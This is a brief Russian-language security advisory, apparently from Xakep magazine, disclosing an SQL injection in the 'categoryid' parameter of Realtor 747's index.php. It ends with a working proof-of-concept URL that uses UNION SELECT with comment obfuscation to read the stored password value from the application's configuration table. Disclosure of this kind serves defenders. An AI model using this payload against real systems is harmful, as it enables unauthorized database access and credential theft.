Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Realtor 747
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «categoryid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://server.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/* */SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21/* */FROM/**/AD747_CONFIG%20where/* */config_key=0x70617373776F7264/*